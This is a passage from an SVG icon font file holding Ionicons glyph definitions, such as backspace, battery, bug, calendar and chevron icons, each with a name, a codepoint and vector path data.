c0 6 0 13 -1 19s-4 12 -7 17s-7 9 -12 12s-12 5 -20 5z" />
    <glyph glyph-name="ion-backspace-outline" unicode="&#xf3be;" horiz-adv-x="512" 
d="M413 116c2 -2 3 -4 3 -6s-1 -4 -3 -6l-21 -22c-2 -2 -4 -2 -6 -2s-4 0 -6 2l-76 77l-76 -77c-2 -2 -4 -2 -6 -2s-4 0 -6 2l-21 22c-2 2 -3 4 -3 6s1 4 3 6l76 76l-77 76c-3 3 -3 9 0 12l22 22c2 2 4 2 6 2s4 0 6 -2l76 -76l76 76c2 2 4 2 6 2s4 0 6 -2l22 -22
c3 -3 3 -9 0 -12l-77 -76zM499 354c9 -9 13 -20 13 -33v-256c0 -27 -20 -49 -46 -49h-298c-13 0 -24 3 -34 9c-9 5 -16 11 -23 20v0l-1 1l-110 146l110 148c14 19 34 28 58 28h298c13 0 24 -5 33 -14zM480 65v256c0 9 -5 15 -14 15h-298c-11 0 -22 -3 -32 -16l-96 -128
l96 -128c8 -10 17 -16 32 -16h298c9 0 14 8 14 17z" />
    <glyph glyph-name="ion-backspace" unicode="&#xf3bf;" horiz-adv-x="512" 
d="M499 354c9 -9 13 -20 13 -33v-256c0 -27 -20 -49 -46 -49h-298c-13 0 -24 3 -34 9c-9 5 -16 11 -23 20v0l-1 1l-110 146l110 148c14 19 34 28 58 28h298c13 0 24 -5 33 -14zM413 116l-76 76l77 76c3 3 3 9 0 12l-22 22c-2 2 -4 2 -6 2s-4 0 -6 -2l-76 -76l-76 76
c-2 2 -4 2 -6 2s-4 0 -6 -2l-22 -22c-3 -3 -3 -9 0 -12l77 -76l-76 -76c-2 -2 -3 -4 -3 -6s1 -4 3 -6l21 -22c2 -2 4 -2 6 -2s4 0 6 2l76 77l76 -77c2 -2 4 -2 6 -2s4 0 6 2l21 22c2 2 3 4 3 6s-1 4 -3 6z" />
    <glyph glyph-name="ion-bag" unicode="&#xf110;" 
d="M416 288l32 -320h-448l32 320h64v4c0 68 56 124 124 124h8c68 0 124 -56 124 -124v-4h64zM128 292v-4h192v4c0 51 -41 92 -92 92v0h-8c-51 0 -92 -41 -92 -92zM36 0h376l-25 256h-35v-36c10 -6 16 -16 16 -28c0 -18 -14 -32 -32 -32s-32 14 -32 32c0 12 6 22 16 28v36
h-192v-36c10 -6 16 -16 16 -28c0 -18 -14 -32 -32 -32s-32 14 -32 32c0 12 6 22 16 28v36h-35z" />
    <glyph glyph-name="ion-battery-charging" unicode="&#xf111;" 
d="M10 64c-6 0 -10 4 -10 10v236c0 6 4 10 10 10h381c6 0 10 -4 10 -10v-54h37c6 0 10 -4 10 -10v-108c0 -6 -4 -10 -10 -10h-37v-54c0 -6 -4 -10 -10 -10h-381zM225 288l-100 -111h61l-27 -81l100 111h-61z" />
    <glyph glyph-name="ion-battery-empty" unicode="&#xf112;" 
d="M438 256c6 0 10 -4 10 -10v-108c0 -6 -4 -10 -10 -10h-37v-54c0 -6 -4 -10 -10 -10h-381c-6 0 -10 4 -10 10v236c0 6 4 10 10 10h381c6 0 10 -4 10 -10v-54h37zM416 160v64h-15h-32v32v32h-337v-192h337v32v32h32h15z" />
    <glyph glyph-name="ion-battery-full" unicode="&#xf113;" 
d="M438 256c6 0 10 -4 10 -10v-108c0 -6 -4 -10 -10 -10h-37v-54c0 -6 -4 -10 -10 -10h-381c-6 0 -10 4 -10 10v236c0 6 4 10 10 10h381c6 0 10 -4 10 -10v-54h37z" />
    <glyph glyph-name="ion-battery-half" unicode="&#xf114;" 
d="M438 256c6 0 10 -4 10 -10v-108c0 -6 -4 -10 -10 -10h-37v-54c0 -6 -4 -10 -10 -10h-381c-6 0 -10 4 -10 10v236c0 6 4 10 10 10h381c6 0 10 -4 10 -10v-54h37zM416 160v64h-15h-32v32v32h-81l32 -192h49v32v32h32h15z" />
    <glyph glyph-name="ion-battery-low" unicode="&#xf115;" 
d="M10 64c-6 0 -10 4 -10 10v236c0 6 4 10 10 10h381c6 0 10 -4 10 -10v-54h37c6 0 10 -4 10 -10v-108c0 -6 -4 -10 -10 -10h-37v-54c0 -6 -4 -10 -10 -10h-381zM369 288h-209l32 -192h177v32v32h32h15v64h-15h-32v32v32z" />
    <glyph glyph-name="ion-beaker" unicode="&#xf269;" horiz-adv-x="384" 
d="M80 256h240v-224c0 -9 -7 -16 -16 -16h-208c-9 0 -16 7 -16 16v224zM296 104v48c0 4 -4 8 -8 8s-8 -4 -8 -8v-48c0 -4 4 -8 8 -8s8 4 8 8zM288 176c4 0 8 4 8 8s-4 8 -8 8s-8 -4 -8 -8s4 -8 8 -8zM381 416c3 0 3 -2 3 -3s-2 -3 -3 -5s-13 -20 -13 -40v-336
c0 -35 -29 -64 -64 -64h-208c-35 0 -64 29 -64 64v307c0 32 -2 33 -32 37c0 12 11 40 65 40h316zM336 368c0 5 0 16 1 16h-273c-1 0 -3 0 -4 -1c5 -7 4 -32 4 -44v-307c0 -18 14 -32 32 -32h210c17 0 30 14 30 32v336z" />
    <glyph glyph-name="ion-beer" unicode="&#xf26a;" 
d="M384 288c35 0 64 -29 64 -64v-96c0 -35 -29 -64 -64 -64h-32v-80c0 -9 -7 -16 -16 -16h-256c-9 0 -16 7 -16 16v223c-26 0 -48 22 -48 48v54v1c-10 11 -16 26 -16 42c0 35 29 64 64 64c18 0 34 -8 46 -20c10 12 26 20 43 20c14 0 27 -6 37 -14c12 9 26 14 42 14
c17 0 34 -6 46 -16c11 10 26 16 42 16c35 0 64 -29 64 -64c0 -24 -18 -44 -32 -48v-16h32zM296 144c4 0 8 3 8 8v0v48c0 4 -4 8 -8 8s-8 -4 -8 -8v-48c0 -3 2 -6 4 -7c1 -1 2 -1 4 -1zM303 220c1 2 1 4 1 6s-1 4 -3 5s-4 1 -6 1s-4 -2 -5 -4s-2 -4 -2 -6s2 -4 4 -5
s4 -1 6 -1s4 2 5 4zM320 288v32h-20c-3 -8 -7 -16 -13 -23c-13 -16 -33 -25 -55 -25c-26 0 -48 13 -61 33c-6 -2 -12 -3 -18 -3c-12 0 -23 4 -32 10c-2 1 -3 3 -5 4c-1 -2 -2 -3 -3 -5c-5 -6 -11 -10 -17 -14v-32v-9h80c0 4 4 8 8 8s8 -4 8 -8h128v32zM351 343c1 3 1 6 1 9
c0 18 -14 32 -32 32c-9 0 -17 -4 -23 -10c-2 -2 -6 -5 -16 -6h-8c-6 1 -12 3 -14 5c-7 7 -16 11 -27 11c-9 0 -18 -4 -25 -9l-7 -7c0 -1 0 -1 -1 -2c-3 -3 -7 -5 -11 -5c-5 0 -8 3 -11 6c-1 2 -2 3 -3 5s-3 4 -5 6c-4 4 -10 6 -16 6c-10 0 -18 -9 -25 -16
c-7 -8 -27 -8 -34 0s-18 16 -30 16c-18 0 -32 -14 -32 -32c0 -2 1 -5 1 -7c2 -9 7 -17 15 -21v-34v-35c0 -9 7 -16 16 -16v26v23v32c10 0 18 4 24 11c2 2 3 4 4 6c0 0 6 10 12 11s20 6 30 -5c4 -5 11 -9 19 -9c3 0 5 1 7 2c3 1 7 2 9 4v0c3 2 6 4 10 4c7 0 12 -4 14 -10
c0 0 1 -1 1 -2c1 -3 1 -5 3 -8c7 -12 20 -20 35 -20c13 0 25 6 32 16c5 7 8 15 8 24s9 8 9 8h7h48c6 0 13 -3 15 -9zM416 128v96c0 18 -14 32 -32 32h-32v-160h32c18 0 32 14 32 32zM128 280c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8s-8 3 -8 8zM288 280c0 5 3 8 8 8s8 -3 8 -8
s-3 -8 -8 -8s-8 3 -8 8z" />
    <glyph glyph-name="ion-bluetooth" unicode="&#xf116;" horiz-adv-x="256" 
d="M12 304c16 16 18 13 19 12l68 -65v0v0c2 -2 10 -10 10 -3v156v0v2c0 6 6 10 12 10c4 0 7 -2 9 -4v0s117 -113 122 -117s5 -10 1 -14l-84 -81s-4 -4 -4 -8s4 -8 4 -8l84 -81c4 -4 4 -10 -1 -14s-122 -117 -122 -117v0c-2 -2 -5 -4 -9 -4c-6 0 -12 4 -12 10v2v0v156
s-8 -1 -10 -3v0v-1l-68 -64c-1 -1 -3 -4 -19 12s-12 17 -11 18s90 86 90 86s4 3 4 8v0c0 5 -4 8 -4 8s-89 85 -90 86s-5 2 11 18zM152 328v-79c0 -8 8 -1 10 1l30 30s3 5 3 7s-1 5 -3 7l-30 30c-2 2 -10 11 -10 4zM152 135v-79s8 2 10 4l30 30c2 2 3 5 3 7s-1 5 -3 7l-30 30
c-2 2 -10 9 -10 1z" />
    <glyph glyph-name="ion-bonfire" unicode="&#xf315;" horiz-adv-x="384" 
d="M207 97l15 -89c1 -3 1 -5 1 -8c0 -18 -14 -32 -32 -32s-32 14 -32 32c0 2 0 5 1 7l15 92v0c2 7 8 13 16 13s15 -7 16 -15zM242 93v0v0v0zM329 58c9 -8 10 -25 0 -35s-27 -9 -35 0c-1 1 -2 3 -3 4l-49 66c-3 5 -2 11 2 15c5 5 10 5 16 1l64 -47c2 -1 3 -3 5 -4zM309 113v0
v0v0zM371 126c9 -1 13 -7 13 -19c0 -9 -10 -14 -18 -12l-57 18v0v0c-3 2 -6 5 -5 9s4 7 8 6zM75 113v0v0v0zM75 113v0l-58 -18c-8 -2 -17 3 -17 12c0 12 3 18 12 19l60 2c4 1 7 -2 8 -6s-2 -7 -5 -9v0zM124 109c5 4 11 4 16 -1c4 -4 5 -10 2 -15l-49 -66c-1 -1 -2 -3 -3 -4
c-10 -10 -25 -10 -35 0s-10 25 0 35c2 2 3 3 5 4zM288 320c0 -32 -9 -58 -50 -86c-37 -26 -94 -46 -110 -106c0 0 -58 24 -48 96s124 106 112 192c24 0 96 -35 96 -96zM288 192c-16 -50 -44 -64 -80 -64c-15 0 -32 9 -43 26c12 15 28 26 47 37c9 5 20 10 29 16
c21 14 38 31 47 49c5 -15 5 -48 0 -64zM88 288c-6 4 -9 14 -8 27c2 22 34 39 32 69c14 2 31 -3 42 -24c-5 -11 -15 -21 -28 -34s-26 -22 -38 -38z" />
    <glyph glyph-name="ion-bookmark" unicode="&#xf26b;" horiz-adv-x="192" 
d="M184 384c4 0 8 -4 8 -8v-56h-192v56c0 4 4 8 8 8h176zM0 0v304h192v-304l-96 96z" />
    <glyph glyph-name="ion-bowtie" unicode="&#xf3c0;" 
d="M192 236c0 0 8 5 20 7c21 4 39 5 47 -9c10 -17 19 -53 17 -85c-1 -17 -5 -22 -5 -22s-15 -10 -47 -7c-35 3 -40 15 -40 15s5 12 8 43s0 58 0 58zM152 163c-17 -4 -38 -10 -38 -10s45 4 64 9c-4 -21 -10 -34 -10 -34s-83 -80 -116 -80c-28 0 -52 68 -52 144s26 144 52 144
c35 0 106 -57 128 -97c0 0 3 -16 2 -32c-10 5 -24 10 -44 14c-28 6 -42 3 -42 3s18 -4 57 -17c15 -5 22 -8 29 -10c0 -3 -1 -7 -1 -10c0 -5 0 -10 -1 -15c-5 -2 -15 -6 -28 -9zM396 336c26 0 52 -68 52 -144s-24 -144 -52 -144c-37 0 -104 68 -112 79c0 0 4 5 5 22v9
c16 -7 70 -13 70 -13s-21 6 -40 11c-13 4 -25 8 -30 10c-1 11 -2 23 -4 33c17 11 69 34 69 34s-15 -2 -35 -9c-14 -5 -29 -11 -37 -14c-3 10 -7 18 -10 24c0 1 -1 4 -1 4v1c22 40 89 97 125 97z" />
    <glyph glyph-name="ion-briefcase" unicode="&#xf26c;" 
d="M240 176v8h208v-176c0 -4 -4 -8 -8 -8h-432c-4 0 -8 4 -8 8v176h208v-8h32zM440 304c4 0 8 -4 8 -8v-96h-208v8h-32v-8h-208v96c0 4 4 8 8 8h120v31c1 28 22 49 51 49h90c30 0 50 -21 51 -49v-31h120zM288 332v1c0 10 -9 19 -19 19h-90c-10 0 -19 -9 -19 -19v-1v-1v-27
h128v27v1z" />
    <glyph glyph-name="ion-bug" unicode="&#xf2be;" 
d="M343 321c-6 -16 -16 -31 -28 -43c-24 -24 -57 -37 -91 -37s-67 13 -91 37c-12 12 -22 27 -28 43c29 39 72 63 119 63s90 -24 119 -63zM95 305c22 -45 68 -77 121 -80v-225c-40 2 -77 22 -104 54c-7 -6 -10 -9 -13 -15c8 -9 7 -22 -1 -31c-9 -10 -24 -11 -34 -2
s-11 24 -2 34l3 3s2 1 2 1c4 13 13 25 27 36c-15 26 -26 57 -29 90c-7 0 -12 -2 -17 -3c-1 -13 -11 -23 -24 -23s-24 11 -24 24s11 24 24 24h3c4 2 8 5 12 6c7 2 14 4 25 4c1 23 6 45 13 65c-6 4 -11 7 -15 11c-6 5 -11 13 -14 19c-1 0 -3 1 -4 2c-12 6 -15 21 -9 33
s21 15 33 9c11 -6 15 -20 10 -31c2 -3 3 -7 4 -8c2 -2 5 -3 8 -5c2 3 3 5 5 8zM424 192c13 0 24 -11 24 -24s-11 -24 -24 -24s-23 10 -24 23c-5 1 -10 3 -17 3c-3 -33 -14 -64 -29 -90c14 -11 23 -23 27 -36c0 0 1 0 2 -1l3 -3c9 -10 8 -25 -2 -34s-25 -8 -34 2
c-8 9 -9 22 -1 31c-3 6 -6 9 -13 15c-27 -32 -64 -52 -104 -54v225c53 3 99 35 121 80c2 -3 3 -5 5 -8c3 2 6 3 8 5c1 1 2 5 4 8c-5 11 -1 25 10 31c12 6 27 3 33 -9s3 -27 -9 -33c-1 -1 -3 -2 -4 -2c-3 -6 -8 -14 -14 -19c-4 -4 -9 -7 -15 -11c7 -20 12 -42 13 -65
c11 0 18 -2 25 -4c4 -1 8 -4 12 -6h3z" />
    <glyph glyph-name="ion-calculator" unicode="&#xf26d;" horiz-adv-x="320" 
d="M304 416c9 0 16 -7 16 -16v-416c0 -9 -7 -16 -16 -16h-288c-9 0 -16 7 -16 16v416c0 9 7 16 16 16h288zM48 240v-32h32v32h-32zM48 176v-32h32v32h-32zM48 112v-32h32v32h-32zM144 16v32h-96v-32h96zM144 80v32h-32v-32h32zM144 144v32h-32v-32h32zM144 208v32h-32v-32
h32zM208 16v32h-32v-32h32zM208 80v32h-32v-32h32zM208 144v32h-32v-32h32zM208 208v32h-32v-32h32zM272 16v96h-32v-96h32zM272 144v32h-32v-32h32zM272 208v32h-32v-32h32zM272 288v80h-224v-80h224z" />
    <glyph glyph-name="ion-calendar" unicode="&#xf117;" 
d="M112 320c-18 0 -32 14 -32 32v32c0 18 14 32 32 32s32 -14 32 -32v-32c0 -18 -14 -32 -32 -32zM336 320c-18 0 -32 14 -32 32v32c0 18 14 32 32 32s32 -14 32 -32v-32c0 -18 -14 -32 -32 -32zM440 384c4 0 8 -4 8 -8v-400c0 -4 -4 -8 -8 -8h-432c-4 0 -8 4 -8 8v400
c0 4 4 8 8 8h56v-41c0 -22 24 -39 48 -39s48 17 48 39v41h128v-41c0 -22 25 -39 49 -39s47 17 47 39v41h56zM400 16v256h-352v-256h352z" />
    <glyph glyph-name="ion-camera" unicode="&#xf118;" horiz-adv-x="416" 
d="M382 301c18 0 34 -14 34 -33v-202c0 -19 -16 -34 -34 -34h-348c-19 0 -34 15 -34 34v202c0 19 15 33 34 33h69l39 40v0c6 7 15 11 25 11h84c9 0 17 -4 23 -10v0v0v0l41 -41h67zM208 82c51 0 92 42 92 93s-41 93 -92 93s-92 -42 -92 -93s41 -93 92 -93zM376 248
c8 0 14 6 14 14s-6 14 -14 14s-14 -6 -14 -14s6 -14 14 -14zM208 245c38 0 70 -31 70 -70s-32 -70 -70 -70c-39 0 -70 31 -70 70s31 70 70 70z" />
    <glyph glyph-name="ion-card" unicode="&#xf119;" 
d="M420 352c16 0 28 -12 28 -28v0v-264v0c0 -16 -12 -28 -28 -28h-392c-16 0 -28 12 -28 28v0v0v264v0v0c0 16 12 28 28 28h392zM45 320c-7 0 -12 -5 -13 -12v-20h384v20c-1 7 -6 12 -13 12h-358zM403 64c7 0 12 5 13 12v116h-384v-116c1 -7 6 -12 13 -12h358zM64 128v16
h192v-16h-192zM64 96v16h96v-16h-96zM320 96v48h64v-48h-64z" />
    <glyph glyph-name="ion-cash" unicode="&#xf316;" horiz-adv-x="512" 
d="M0 352h512v-256h-512v256zM193 128c-20 23 -33 58 -33 96s13 73 33 96h-97c0 -35 -29 -64 -64 -64v-80c27 0 48 -21 48 -48h113zM298 187c3 4 4 9 4 15c0 3 0 5 -1 8s-2 6 -4 8s-4 4 -7 6s-6 4 -10 5c-1 0 -4 1 -7 2s-5 0 -8 1v31c2 -1 5 -2 7 -3c4 -3 6 -7 7 -13h20
c0 5 -2 9 -4 13s-5 8 -9 11s-9 5 -14 6c-2 1 -5 2 -7 2v9h-18v-9c-2 0 -4 -1 -6 -2c-5 -1 -10 -2 -14 -5s-7 -6 -9 -10s-4 -9 -4 -14c0 -3 0 -5 1 -8s2 -5 4 -7s5 -5 8 -7s7 -4 12 -5c3 -1 6 0 8 -1v-35c-3 1 -6 2 -9 4s-5 4 -6 7s-2 6 -2 9h-20c0 -5 2 -11 4 -16
c3 -5 6 -8 10 -11s9 -6 15 -7c3 -1 5 -2 8 -2v-9h18v9c3 0 6 1 9 2c5 1 10 2 14 5s7 7 10 11zM480 176v80c-35 0 -64 29 -64 64h-97c20 -23 33 -58 33 -96s-13 -73 -33 -96h113c0 27 22 48 48 48zM64 224c0 21 11 32 32 32s32 -11 32 -32s-11 -32 -32 -32s-32 11 -32 32z
M384 224c0 21 11 32 32 32s32 -11 32 -32s-11 -32 -32 -32s-32 11 -32 32zM273 213c2 -1 4 -2 6 -4s3 -5 3 -9c0 -2 0 -4 -1 -6s-2 -4 -4 -5s-5 -3 -8 -4c-1 0 -2 -1 -4 -1v31c3 -1 6 -1 8 -2zM236 257c1 2 3 3 5 4s4 2 6 2v-26c-4 1 -7 3 -9 5s-4 4 -4 8c0 3 1 5 2 7zM0 32
v32h512v-32h-512z" />
    <glyph glyph-name="ion-chatbox-working" unicode="&#xf11a;" horiz-adv-x="416" 
d="M76 48c-42 0 -76 31 -76 71v209c0 40 34 72 76 72h264c42 0 76 -32 76 -72v-209c0 -40 -34 -71 -76 -71h-4v-64s-79 54 -86 59s-7 5 -21 5h-153zM304 256c-18 0 -32 -14 -32 -32s14 -32 32 -32s32 14 32 32s-14 32 -32 32zM208 256c-18 0 -32 -14 -32 -32s14 -32 32 -32
s32 14 32 32s-14 32 -32 32zM112 256c-18 0 -32 -14 -32 -32s14 -32 32 -32s32 14 32 32s-14 32 -32 32z" />
    <glyph glyph-name="ion-chatbox" unicode="&#xf11b;" horiz-adv-x="416" 
d="M76 48c-42 0 -76 31 -76 71v209c0 40 34 72 76 72h264c42 0 76 -32 76 -72v-209c0 -40 -34 -71 -76 -71h-4v-64s-79 54 -86 59s-7 5 -21 5h-153z" />
    <glyph glyph-name="ion-chatboxes" unicode="&#xf11c;" horiz-adv-x="416" 
d="M246 82l26 -18c-4 -21 -29 -32 -52 -32h-90c-8 0 -11 -2 -13 -3l-53 -45v48h-16c-26 0 -48 16 -48 41v129c0 25 20 45 46 45h2v-101c0 -33 29 -59 64 -59h117c10 0 14 -3 17 -5zM353 400c35 0 63 -27 63 -60v-168c0 -33 -28 -60 -63 -60h-17v-64l-75 60c-2 2 -7 4 -17 4
h-101c-35 0 -63 27 -63 60v98v70c0 33 21 60 56 60h217z" />
    <glyph glyph-name="ion-chatbubble-working" unicode="&#xf11d;" horiz-adv-x="416" 
d="M208 -1c-115 0 -208 89 -208 200s93 201 208 201s208 -90 208 -201c0 -40 -12 -77 -33 -108c-1 -1 -2 -3 -3 -4v0c-2 -4 -4 -10 -4 -15l22 -88l-84 31c-4 2 -8 2 -12 2s-7 -1 -11 -2v0c-1 0 -1 -1 -2 -1c-25 -10 -52 -15 -81 -15zM304 224c-18 0 -32 -14 -32 -32
s14 -32 32 -32s32 14 32 32s-14 32 -32 32zM208 224c-18 0 -32 -14 -32 -32s14 -32 32 -32s32 14 32 32s-14 32 -32 32zM112 224c-18 0 -32 -14 -32 -32s14 -32 32 -32s32 14 32 32s-14 32 -32 32z" />
    <glyph glyph-name="ion-chatbubble" unicode="&#xf11e;" horiz-adv-x="416" 
d="M208 -1c-115 0 -208 89 -208 200s93 201 208 201s208 -90 208 -201c0 -40 -12 -77 -33 -108c-1 -1 -2 -3 -3 -4v0c-2 -4 -4 -10 -4 -15l22 -88l-84 31c-4 2 -8 2 -12 2s-7 -1 -11 -2v0c-1 0 -1 -1 -2 -1c-25 -10 -52 -15 -81 -15z" />
    <glyph glyph-name="ion-chatbubbles" unicode="&#xf11f;" horiz-adv-x="416" 
d="M25 57c-1 1 0 2 -1 3c-15 22 -24 49 -24 77c0 42 19 80 49 106c-2 -11 -4 -22 -4 -34c0 -92 78 -168 174 -168c15 0 30 2 44 6c-27 -32 -69 -53 -115 -53c-20 0 -40 5 -58 12h-1v0c-2 1 -5 2 -8 2s-6 -1 -9 -2l-56 -22l12 63c0 4 -1 7 -3 10v0zM242 400
c96 0 174 -76 174 -168c0 -33 -11 -64 -28 -90c-1 -1 -1 -2 -2 -3v0c-2 -4 -3 -8 -3 -12l17 -74l-69 26c-3 1 -6 2 -10 2c-3 0 -6 -1 -9 -2v0l-2 -1c-8 -3 -16 -5 -24 -7c-14 -4 -29 -6 -44 -6c-96 0 -173 75 -173 167c0 12 1 24 3 35c16 76 86 133 170 133z" />
    <glyph glyph-name="ion-checkmark-circled" unicode="&#xf120;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM339 267c1 1 1 2 1 3s0 3 -1 4l-31 24c-1 1 -3 1 -4 1s-2 0 -3 -1l-111 -143s-44 42 -45 43s-4 3 -6 3s-3 -2 -4 -3l-25 -25l-1 -1c-1 -1 -1 -3 -1 -4s0 -2 1 -3l2 -1
s78 -75 79 -76s3 -3 5 -3s4 2 5 3z" />
    <glyph glyph-name="ion-checkmark-round" unicode="&#xf121;" horiz-adv-x="416" 
d="M400 376c17 -13 22 -39 9 -57l-207 -302c-13 -18 -37 -22 -54 -9s-137 147 -137 147c-15 16 -15 42 1 58s40 15 55 -2l99 -107l180 263c13 18 37 22 54 9z" />
    <glyph glyph-name="ion-checkmark" unicode="&#xf122;" horiz-adv-x="416" 
d="M414 338c1 -2 2 -4 2 -6s-1 -4 -2 -6l-249 -320c-2 -2 -5 -6 -9 -6s-8 3 -10 5s-141 136 -141 136l-3 3c-1 2 -2 4 -2 6s1 3 2 5l2 2c14 15 42 44 44 46s4 6 8 6s8 -4 10 -6s80 -78 80 -78l200 257c2 2 4 2 6 2s5 -1 7 -2z" />
    <glyph glyph-name="ion-chevron-down" unicode="&#xf123;" 
d="M224 150v0v0l174 167c4 4 12 4 16 0l31 -30c4 -4 4 -12 0 -16l-213 -204c-2 -2 -5 -3 -8 -3s-6 1 -8 3l-213 204c-4 4 -4 12 0 16l31 30c4 4 12 4 16 0z" />
    <glyph glyph-name="ion-chevron-left" unicode="&#xf124;" horiz-adv-x="256" 
d="M86 192l167 -174c4 -4 4 -12 0 -16l-30 -31c-4 -4 -12 -4 -16 0l-204 213c-2 2 -3 5 -3 8s1 6 3 8l204 213c4 4 12 3 16 -1l30 -30c4 -4 4 -12 0 -16l-167 -174v0v0z" />
    <glyph glyph-name="ion-chevron-right" unicode="&#xf125;" horiz-adv-x="256" 
d="M170 192v0v0l-167 174c-4 4 -4 12 0 16l30 30c4 4 12 5 16 1l204 -213c2 -2 3 -5 3 -8s-1 -6 -3 -8l-204 -213c-4 -4 -12 -4 -16 0l-30 31c-4 4 -4 12 0 16z" />
    <glyph glyph-name="ion-chevron-up" unicode="&#xf126;" 
d="M224 234l-174 -167c-4 -4 -12 -4 -16 0l-31 30c-4 4 -4 12 0 16l213 204c2 2 5 3 8 3s6 -1 8 -3l213 -204c4 -4 4 -12 0 -16l-31 -30c-4 -4 -12 -4 -16 0l-174 167v0v0z" />
    <glyph glyph-name="ion-clipboard" unicode="&#xf127;" horiz-adv-x="352" 
d="M80 288c2 20 10 35 28 40l1 1c12 3 21 7 21 20v21c0 26 21 46 46 46s46 -20 46 -46v-21c0 -13 9 -18 21 -21h2c18 -5 25 -20 27 -40h-192zM176 384c-8 0 -13 -6 -13 -14s5 -14 13 -14s14 6 14 14s-6 14 -14 14zM325 384c15 0 27 -12 27 -28v-360c0 -16 -12 -28 -27 -28
h-149h-148c-15 0 -28 12 -28 28v360c0 16 13 28 28 28h73v-13c0 -11 -9 -19 -19 -19h-37c-7 0 -12 -6 -12 -13v-327c0 -6 5 -12 11 -12h265c6 0 11 6 11 12v327c0 7 -5 13 -12 13h-37c-10 0 -20 8 -20 19v13h74zM64 224v32h112v-32h-112zM64 32v32h160v-32h-160zM64 96v32
h129v-32h-129zM64 160v32h208v-32h-208z" />
    <glyph glyph-name="ion-clock" unicode="&#xf26e;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM360 56c10 10 19 21 26 33l-27 16l8 14l27 -16c13 25 21 52 22 81h-32v16h32c-1 29 -9 56 -22 81l-27 -16l-8 14l27 16c-7 12 -16 23 -26 33s-21 19 -33 26l-16 -27l-14 8
l16 27c-25 13 -52 21 -81 22v-32h-16v32c-29 -1 -56 -9 -81 -22l16 -27l-14 -8l-16 27c-12 -7 -23 -16 -33 -26s-19 -21 -26 -33l27 -16l-8 -14l-27 16c-13 -25 -21 -52 -22 -81h32v-16h-32c1 -29 9 -56 22 -81l27 16l8 -14l-27 -16c7 -12 16 -23 26 -33s21 -19 33 -26
l16 27l14 -8l-16 -27c25 -13 52 -21 81 -22v32h16v-32c29 1 56 9 81 22l-16 27l14 8l16 -27c12 7 23 16 33 26zM368 207v-32h-117c-6 -9 -16 -15 -27 -15c-18 0 -32 14 -32 32c0 12 6 22 16 28v68h32v-68c5 -3 9 -8 12 -13h116z" />
    <glyph glyph-name="ion-close-circled" unicode="&#xf128;" 
d="M224 415c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM332 116l-75 75l76 75c3 3 3 9 0 12l-22 21c-2 2 -4 3 -6 3s-3 -1 -5 -3l-76 -74l-76 74c-2 2 -3 3 -5 3s-4 -1 -6 -3l-21 -21c-3 -3 -3 -9 0 -12l76 -75l-76 -76
c-2 -1 -2 -3 -2 -5s0 -4 2 -6l21 -22c2 -2 4 -2 6 -2s4 0 6 2l75 76l76 -75c2 -2 3 -3 5 -3s4 1 6 3l21 21c2 1 3 4 3 6s-1 4 -3 6z" />
    <glyph glyph-name="ion-close-round" unicode="&#xf129;" horiz-adv-x="384" 
d="M374 61c14 -14 14 -37 0 -51s-37 -14 -51 0l-131 131l-131 -131c-14 -14 -36 -14 -50 0s-14 37 0 51l130 131l-130 131c-14 14 -14 37 0 51s36 14 50 0l131 -131l131 131c14 14 37 14 51 0s14 -37 0 -51l-131 -131z" />
    <glyph glyph-name="ion-close" unicode="&#xf12a;" horiz-adv-x="384" 
d="M380 61c3 -3 4 -6 4 -10s-1 -7 -4 -10l-38 -37c-3 -3 -5 -4 -9 -4s-7 1 -10 4l-131 131l-131 -131c-3 -3 -5 -4 -9 -4s-7 1 -10 4l-38 37c-3 3 -4 6 -4 10s1 7 4 10l132 131l-132 130c-5 5 -5 15 0 20l37 38c3 2 6 4 10 4s7 -1 10 -4l131 -130l131 130c3 2 6 4 10 4
s7 -1 10 -4l37 -38c5 -5 5 -14 0 -19l-132 -130z" />
    <glyph glyph-name="ion-closed-captioning" unicode="&#xf317;" horiz-adv-x="512" 
d="M0 384h512v-384h-512v384zM464 192c0 27 0 44 -4 80s-23 56 -59 60s-91 4 -138 4h-7h-7c-47 0 -102 0 -138 -4s-55 -24 -59 -60s-4 -53 -4 -80s2 -47 4 -80s19 -56 59 -60s96 -4 145 -4s105 0 145 4s57 27 59 60s4 53 4 80zM372 164v4h53c0 -27 -7 -48 -19 -62
s-32 -21 -61 -21c-14 0 -26 2 -36 5s-18 9 -25 17s-12 19 -15 33s-5 30 -5 51s3 39 7 53s9 25 17 33s17 14 27 17s22 5 34 5c25 0 44 -7 57 -21s19 -37 19 -62h-52v1c0 20 -12 33 -27 33s-25 -11 -28 -30c0 0 -2 -11 -2 -29s2 -28 2 -28c1 -17 12 -29 27 -29s27 10 27 29v1z
M195 164v4h53c0 -27 -7 -48 -19 -62s-32 -21 -61 -21c-14 0 -26 2 -36 5s-18 9 -25 17s-12 19 -15 33s-5 30 -5 51s3 39 7 53s9 25 17 33s17 14 27 17s22 5 34 5c25 0 44 -7 57 -21s19 -37 19 -62h-52v1c0 20 -12 33 -27 33s-25 -11 -28 -30c0 0 -2 -11 -2 -29s2 -28 2 -28
c1 -17 12 -29 27 -29s27 10 27 29v1z" />
    <glyph glyph-name="ion-cloud" unicode="&#xf12b;" 
d="M366 215c45 0 82 -38 82 -84s-37 -83 -82 -83v0h-276c-49 0 -90 41 -90 91c0 40 26 74 61 86c5 29 29 51 59 51c10 0 18 -3 26 -7c19 40 59 67 105 67c64 0 115 -53 115 -118v-3z" />
    <glyph glyph-name="ion-code-download" unicode="&#xf26f;" 
d="M299 164l-63 -63v0l-1 -1v0l-2 -1v0l-1 -1v0l-2 -1v0h-1v0h-1c-1 0 -3 -1 -4 -1s-3 1 -4 1h-1v0h-1v0l-2 1v0l-1 1v0c-1 1 -2 1 -3 2v0l-63 63c-6 6 -6 17 0 23s18 6 24 0l35 -34v118c0 9 7 17 16 17s16 -8 16 -17v-118l35 34c6 6 18 6 24 0s6 -17 0 -23zM136 56
